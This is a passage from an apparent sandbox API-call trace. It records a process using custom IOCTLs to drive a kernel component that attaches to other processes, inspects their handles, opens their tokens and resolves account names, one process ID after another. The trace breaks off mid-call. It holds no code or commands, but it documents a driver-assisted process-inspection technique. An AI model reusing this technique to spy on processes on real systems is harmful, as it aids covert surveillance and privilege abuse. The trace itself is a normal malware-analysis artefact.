[0226.531] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020aeb00, HandleInformation=0x0) returned 0x0 [0226.531] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.531] PsReleaseProcessExitSynchronization () returned 0x2 [0226.531] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0226.531] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.531] ObfDereferenceObject (Object=0xfffffa80020aeb00) returned 0x1 [0226.531] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.531] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.531] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.531] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.531] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.531] PsAcquireProcessExitSynchronization () returned 0x0 [0226.531] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880052b35d0) [0226.531] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.531] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.531] PsReleaseProcessExitSynchronization () returned 0x2 [0226.531] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0226.531] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.531] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.531] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.531] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x854) returned 0xc8 [0226.531] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.531] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020b8b30, HandleInformation=0x0) returned 0x0 [0226.531] ObOpenObjectByPointer (in: Object=0xfffffa80020b8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.532] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x14 [0226.532] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.532] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.532] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.532] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.532] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.533] CloseHandle (hObject=0xc4) returned 1 [0226.533] CloseHandle (hObject=0xc8) returned 1 [0226.534] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.534] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.534] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.534] PsAcquireProcessExitSynchronization () returned 0x0 [0226.534] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880052b35d0) [0226.534] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f4cb00, HandleInformation=0x0) returned 0x0 [0226.534] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.534] PsReleaseProcessExitSynchronization () returned 0x2 [0226.534] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0226.534] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.534] ObfDereferenceObject (Object=0xfffffa8001f4cb00) returned 0x1 [0226.534] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.534] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.534] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.534] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0226.534] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.534] PsAcquireProcessExitSynchronization () returned 0x0 [0226.534] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880052b35d0) [0226.534] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020b8400, HandleInformation=0x0) returned 0x0 [0226.534] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.534] PsReleaseProcessExitSynchronization () returned 0x2 [0226.534] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0226.534] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.534] ObfDereferenceObject (Object=0xfffffa80020b8400) returned 0x1 [0226.534] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.535] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.535] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.535] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.535] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.535] PsAcquireProcessExitSynchronization () returned 0x0 [0226.535] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880052b35d0) [0226.535] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.535] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.535] PsReleaseProcessExitSynchronization () returned 0x2 [0226.535] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0226.535] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.535] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.535] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.535] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0xc8 [0226.535] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.535] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020c1760, HandleInformation=0x0) returned 0x0 [0226.535] ObOpenObjectByPointer (in: Object=0xfffffa80020c1760, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.535] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x14 [0226.535] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.535] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.535] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.536] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.536] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.548] CloseHandle (hObject=0xc4) returned 1 [0226.548] CloseHandle (hObject=0xc8) returned 1 [0226.548] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.548] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.548] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.548] PsAcquireProcessExitSynchronization () returned 0x0 [0226.548] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880052b35d0) [0226.549] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020c6d20, HandleInformation=0x0) returned 0x0 [0226.549] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.549] PsReleaseProcessExitSynchronization () returned 0x2 [0226.549] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0226.549] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.549] ObfDereferenceObject (Object=0xfffffa80020c6d20) returned 0x1 [0226.549] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.549] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.549] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.549] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0226.549] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.549] PsAcquireProcessExitSynchronization () returned 0x0 [0226.549] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880052b35d0) [0226.549] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020c14e0, HandleInformation=0x0) returned 0x0 [0226.549] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.549] PsReleaseProcessExitSynchronization () returned 0x2 [0226.549] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0226.549] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.549] ObfDereferenceObject (Object=0xfffffa80020c14e0) returned 0x1 [0226.549] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.550] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.550] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.550] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.550] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.550] PsAcquireProcessExitSynchronization () returned 0x0 [0226.550] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880052b35d0) [0226.550] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.550] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.550] PsReleaseProcessExitSynchronization () returned 0x2 [0226.550] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0226.550] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.550] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.550] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.550] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x874) returned 0xc8 [0226.550] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.550] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020cf7c0, HandleInformation=0x0) returned 0x0 [0226.550] ObOpenObjectByPointer (in: Object=0xfffffa80020cf7c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.550] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x14 [0226.550] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.551] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.551] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.551] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.551] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.552] CloseHandle (hObject=0xc4) returned 1 [0226.552] CloseHandle (hObject=0xc8) returned 1 [0226.552] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.553] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.553] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.553] PsAcquireProcessExitSynchronization () returned 0x0 [0226.553] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880052b35d0) [0226.553] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020d4a20, HandleInformation=0x0) returned 0x0 [0226.553] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.553] PsReleaseProcessExitSynchronization () returned 0x2 [0226.553] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0226.553] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.553] ObfDereferenceObject (Object=0xfffffa80020d4a20) returned 0x1 [0226.553] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.553] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.553] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.553] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0226.553] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.553] PsAcquireProcessExitSynchronization () returned 0x0 [0226.553] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880052b35d0) [0226.553] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020d9070, HandleInformation=0x0) returned 0x0 [0226.553] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.553] PsReleaseProcessExitSynchronization () returned 0x2 [0226.553] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0226.553] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.553] ObfDereferenceObject (Object=0xfffffa80020d9070) returned 0x1 [0226.553] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.554] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.554] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.554] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.554] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.554] PsAcquireProcessExitSynchronization () returned 0x0 [0226.554] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880052b35d0) [0226.554] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.554] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.554] PsReleaseProcessExitSynchronization () returned 0x2 [0226.554] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0226.554] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.554] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.554] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.554] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.554] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x884) returned 0xc8 [0226.554] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.554] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80020d1b30, HandleInformation=0x0) returned 0x0 [0226.554] ObOpenObjectByPointer (in: Object=0xfffffa80020d1b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.554] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x14 [0226.554] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.555] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.555] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.555] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.555] LookupAccountSidW (in: lpSystemName="", 